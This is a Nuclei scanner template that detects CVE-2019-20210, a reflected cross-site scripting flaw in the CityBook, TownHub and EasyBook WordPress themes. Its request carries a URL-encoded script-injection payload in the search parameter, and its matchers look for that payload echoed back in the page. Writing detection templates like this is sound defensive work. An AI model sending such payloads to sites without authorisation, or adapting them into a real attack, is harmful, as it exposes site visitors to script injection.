nuclei-templates/cves/2019/CVE-2019-20210.yaml

45 lines
1.3 KiB
YAML
Raw Normal View History

2022-06-16 05:38:51 +00:00
id: CVE-2019-20210
info:
name: WordPress CTHthemes - Cross-Site Scripting
2022-06-16 05:38:51 +00:00
author: edoardottt
severity: medium
2022-06-17 05:33:00 +00:00
description: |
WordPress CTHthemes CityBook before 2.3.4, TownHub before 1.0.6, and EasyBook before 1.2.2 themes contain reflected cross-site scripting vulnerabilities via a search query.
2022-06-17 05:33:00 +00:00
reference:
- https://wpscan.com/vulnerability/10013
- https://wpvulndb.com/vulnerabilities/10018
- https://cxsecurity.com/issue/WLB-2019120112
- https://nvd.nist.gov/vuln/detail/CVE-2019-20210
2022-06-16 05:38:51 +00:00
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2019-20210
cwe-id: CWE-79
tags: wp-theme,wpscan,cve,cve2019,wordpress,citybook,xss
2022-06-16 05:38:51 +00:00
requests:
- method: GET
path:
2022-06-17 05:33:00 +00:00
- "{{BaseURL}}/?search_term=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&location_search=&nearby=off&address_lat=&address_lng=&distance=10&lcats%5B%5D="
2022-06-16 05:38:51 +00:00
matchers-condition: and
matchers:
- type: word
2022-06-17 05:33:00 +00:00
part: body
2022-06-16 05:38:51 +00:00
words:
2022-06-17 05:33:00 +00:00
- "</script><script>alert(document.domain)</script>"
- "/wp-content/themes/citybook"
condition: and
2022-06-16 05:38:51 +00:00
- type: word
2022-06-17 05:33:00 +00:00
part: header
2022-06-16 05:38:51 +00:00
words:
2022-06-17 05:33:00 +00:00
- text/html
- type: status
status:
- 200
# Enhanced by mp on 2022/08/31